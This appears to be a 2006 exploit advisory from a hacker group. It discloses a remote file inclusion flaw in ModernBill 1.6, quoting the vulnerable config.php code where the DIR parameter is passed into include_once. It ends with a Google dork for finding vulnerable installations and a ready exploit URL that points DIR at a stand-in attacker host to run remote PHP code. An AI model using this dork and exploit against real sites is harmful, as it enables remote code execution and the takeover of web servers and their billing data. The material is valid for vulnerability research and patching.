#############################SolpotCrew Community################################

#

# modernbill ver 1.6 (DIR) Remote File Inclusion

#

# Download file : http://freshmeat.net/projects/modernbill/

#

########################################################################
#########

#

#

# Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006)

#

# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]

#

# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt

#

########################################################################
########

#

#

# Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,

# L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy

# home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu

# and all crew #mardongan @ irc.dal.net

#

#

########################################################################
#######

Input passed to the "DIR" is not properly verified

before being used to include files. This can be exploited to execute

arbitrary PHP code by including files from local or external resources.

code from include/html/config.php

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");

#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_m
ysql_write","sess_mysql_destroy","sess_mysql_gc");

//session_start();

session_register("set_language");

session_register("v");

$new_language = ($set_language) ? $set_language : NULL ;

$signup_form = TRUE;

include_once($DIR."include/functions.inc.php");

## ------------------------------------------------------

## DO NOT CHANGE STOP

## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################

######################################E.O.F#############################
#####

[ reply ]